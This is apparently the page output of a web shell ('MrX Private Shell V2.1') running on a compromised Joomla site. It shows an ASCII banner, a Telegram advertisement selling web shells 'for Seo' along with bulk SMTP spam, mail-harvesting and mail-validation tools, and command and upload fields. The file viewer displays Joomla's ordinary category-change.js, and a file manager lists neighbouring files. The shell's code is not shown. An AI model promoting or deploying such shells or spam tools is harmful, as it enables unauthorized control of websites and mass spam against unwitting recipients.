__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
(function () {
  'use strict';

  /**
   * @copyright  (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
   * @license    GNU General Public License version 2 or later; see LICENSE.txt
   */
  (function (Joomla) {
    var id = Joomla.getOptions('category-change');
    var element = document.querySelector("#" + id);
    if (!element) {
      throw new Error('Category Id element not found');
    }
    if (element.getAttribute('data-refresh-catid') && element.value !== element.getAttribute('data-cat-id')) {
      element.value = element.getAttribute('data-refresh-catid');
    } else {
      // No custom fields
      element.setAttribute('data-refresh-catid', element.value);
    }
    window.Joomla.categoryHasChanged = function (el) {
      if (el.value === el.getAttribute('data-refresh-catid')) {
        return;
      }
      document.body.appendChild(document.createElement('joomla-core-loader'));

      // Custom Fields
      if (el.getAttribute('data-refresh-section')) {
        document.querySelector('input[name=task]').value = el.getAttribute('data-refresh-section') + ".reload";
      }
      Joomla.submitform(el.getAttribute('data-refresh-section') + ".reload", element.form);
    };
  })(Joomla);

})();

Filemanager

Name Type Size Permission Actions
category-change-es5.js File 1.21 KB 0664
category-change-es5.min.js File 884 B 0664
category-change-es5.min.js.gz File 457 B 0664
category-change.js File 1.1 KB 0664
category-change.min.js File 847 B 0664
category-change.min.js.gz File 444 B 0664
Filemanager